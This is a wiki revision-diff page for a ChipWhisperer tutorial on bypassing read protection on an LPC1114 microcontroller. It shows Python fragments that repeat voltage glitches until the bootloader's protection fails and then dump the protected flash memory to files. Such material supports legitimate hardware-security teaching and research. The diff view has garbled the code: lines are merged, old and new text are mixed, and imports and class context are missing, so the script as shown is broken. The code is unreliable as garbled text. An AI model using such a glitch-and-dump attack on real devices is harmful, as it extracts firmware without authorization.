As of August 2020 the site you are on (wiki.newae.com) is deprecated, and content is now at rtfm.newae.com.

Changes

Jump to: navigation, search

Tutorial A9 Bypassing LPC1114 Read Protect

180 bytes added, 18:50, 23 November 2018
Method 2: Stand Alone Scripting for Stopping Glitch when Success & Dumping Memory
For use without the CW GUI
"""
from __future__ import print_function
import sys
import numpy as np
import chipwhisperer as cw
from tqdm import trange
logging.basicConfig(level=logging.NOTSET)
scope = cw.scope()
#wait for full response, since we need to make sure we don't throw off baud calc
self.read_line(0)
 
self.serial.write("Synchronized\r\n")
self.read_line(10)
#about these unexpected returns
if "19" not in s:
print ( "Unexpected error code " + s)
return False
def dump_flash(self, start_addr = 0, length = 0x8000, rd_len = 24):
if start_addr % 4:
print ("Address not 4 byte aligned!")
return -1
if length % 4:
print ("Length not 4 byte aligned!")
return -1
bin_file = open("bin_flash.bin", "wb")
print ("Doing loop") for i in rangetrange(start_addr, start_addr + length - 1, rd_len):
self.serial.write("R {:d} {:d}\r\n".format(i, rd_len))
err = self.read_line()
if "13" in err:
#addr err
print ("addr error: addr = {:d}".format(i))
return -1
flash = self.read_line(0)
if flash: data_len = ord(flash[0]) - 32 if rd_len != data_len: print ("Unexpected data_len {:x}, expected {:x}".format(data_len, rd_len)) print ("Actual flash: " + flash)
# Bootloader uses ` instead of space for 0 data = flash.replace('`', " ") checksum = self.read_line() #eat checksum for now, can check it later
self.serial.write("OK\r\n") try: uu_file.write("0x{:08x}: ".format(i) + data + "\n")
binary_data = binascii.a2b_uu(data) bin_file.write(binary_data) ascii_file.write("0x{:08x}: ".format(i) + str(binascii.hexlify(binary_data)) + "\n") except binascii.Error, as e: print ( "Invalid data: " + data) print ( "\nError: " + str(e) + "\n")
scope.glitch.repeat = repeat_range.min
print ("Entering glitch loop")
# it may take quite a few cycles to get a glitch, so just attempt until we get it
s = glitcher.get_read_string()
print ( "Read string: " + s) print ( "Offset = {:04d}, Repeat = {:02d}".format(scope.glitch.ext_offset, scope.glitch.repeat))
if glitcher.check_err_rtn(s):
print ("Success!")
glitcher.dump_flash()
cleanup_exit()
scope.glitch.repeat += repeat_range.step
 
cleanup_exit()
 
def cleanup_exit():
scope.dis()
target.dis()
exit()
cleanup_exit()
</syntaxhighlight>
Approved_users, administrator
366
edits

Navigation menu